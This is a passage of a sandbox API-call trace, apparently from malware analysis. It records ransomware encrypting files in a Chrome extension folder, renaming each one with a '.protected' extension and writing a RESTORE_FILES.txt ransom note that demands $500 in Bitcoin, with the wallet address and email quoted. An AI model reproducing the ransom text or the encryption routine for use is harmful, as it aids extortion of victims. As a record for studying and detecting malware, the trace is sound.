Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.848] StrStrIW (lpFirst="craw_window.html", lpSrch=".protected") returned 0x0 [0080.848] lstrcmpW (lpString1="craw_window.html", lpString2="RESTORE_FILES.txt") returned -1 [0080.848] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.848] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW (lpFirst="craw_window.html", lpSrch=".txt") returned 0x0 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW (lpFirst="craw_window.html", lpSrch=".rar") returned 0x0 [0080.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html") returned 155 [0080.849] StrStrW 
(lpFirst="craw_window.html", lpSrch=".zip") returned 0x0 [0080.849] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x32a, lpOverlapped=0x0) returned 1 [0080.850] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffcd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.850] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x32a, lpOverlapped=0x0) returned 1 [0080.851] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.851] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.851] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.851] CloseHandle (hObject=0x164) returned 1 [0080.851] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected") returned 165 [0080.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html.protected")) returned 1 [0080.852] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.852] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.852] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\RESTORE_FILES.txt") returned 156 [0080.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.852] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.852] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.853] lstrlenA (lpString="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") returned 684 [0080.853] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.854] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.854] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.854] CloseHandle (hObject=0x160) returned 1 [0080.854] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Windows") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Program Files") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="Program Files (x86)") returned -1 [0080.854] lstrcmpiW (lpString1="images", lpString2="$Recycle.bin") returned 1 [0080.854] lstrcmpiW (lpString1="images", lpString2="System Volume Information") returned -1 [0080.854] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images") returned 140 [0080.854] lstrcmpW (lpString1="images", lpString2=".") returned 1 [0080.854] lstrcmpW (lpString1="images", lpString2="..") returned 1 [0080.854] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*") returned 142 [0080.854] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 
[0080.858] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\.") returned 142 [0080.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.858] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\..") returned 143 [0080.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.858] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Windows") returned -1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Program Files") returned -1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="Program Files (x86)") returned 
-1 [0080.858] lstrcmpiW (lpString1="flapper.gif", lpString2="$Recycle.bin") returned 1 [0080.859] lstrcmpiW (lpString1="flapper.gif", lpString2="System Volume Information") returned -1 [0080.859] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrIW (lpFirst="flapper.gif", lpSrch=".protected") returned 0x0 [0080.859] lstrcmpW (lpString1="flapper.gif", lpString2="RESTORE_FILES.txt") returned -1 [0080.859] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.859] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".txt") returned 0x0 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 
[0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".rar") returned 0x0 [0080.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif") returned 152 [0080.859] StrStrW (lpFirst="flapper.gif", lpSrch=".zip") returned 0x0 [0080.859] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.861] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.862] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.862] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.862] CloseHandle (hObject=0x164) returned 1 [0080.862] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected") returned 162 [0080.862] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\flapper.gif.protected")) returned 1 [0080.863] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Windows") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0080.863] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0080.863] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.863] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0080.863] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.863] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0080.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0080.864] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0080.864] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x1109, lpOverlapped=0x0) returned 1 [0080.868] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffeef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.868] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, 
nNumberOfBytesToWrite=0x1109, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x1109, lpOverlapped=0x0) returned 1 [0080.869] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.869] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.869] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.869] CloseHandle (hObject=0x164) returned 1 [0080.869] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected") returned 163 [0080.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.protected")) returned 1 [0080.870] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | 
out: lpFindFileData=0x295dba0) returned 1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0080.870] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0080.870] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.870] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0080.870] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.870] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.870] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 
152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0080.872] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x22c, lpOverlapped=0x0) returned 1 [0080.872] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffdd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.872] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x22c, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x22c, lpOverlapped=0x0) returned 1 [0080.873] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.873] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.873] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.873] CloseHandle (hObject=0x164) returned 1 [0080.873] wnsprintfW (in: pszDest=0xd010e0, 
